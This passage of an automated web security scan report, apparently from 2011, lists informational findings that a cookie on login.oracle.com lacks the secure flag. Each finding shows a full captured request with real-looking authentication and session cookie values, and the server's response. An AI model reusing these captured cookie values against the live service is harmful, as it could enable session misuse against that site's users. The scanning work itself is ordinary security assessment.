Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

site2pstoretoken=v1.4%7E40F0BA36%7E0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010
...[SNIP]...

Response

7.13. https://login.oracle.com/mysso/sso_loginui/b-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/b-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 51
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCB_6uHK6EVADUS1EHWFB01t_ck
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a...................!.......,..............P.;

7.14. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/b-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-l-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 188
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCBj6uHK6EVADUS1EHWFB01t_cl
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.......................................................................................................!.......,..........9.4.dY.f:........@..=./\H....k.......$t..D.(....t;M...x...;

7.15. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/b-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-r-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 190
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCXF6uHK6EVADUS1EHWFB01t_dQ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89a.......................................................................................................!.......,..........; %.$9..x..../y.1A...NB,6...2Y.b.I...L..V.0. "...*.8H..8. .B.;

7.16. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-b-l-b.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-l-b.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCB_6uHK6EVADUS1EHWFB01t_cj
X-Powered-By: Servlet/2.5 JSP/2.1
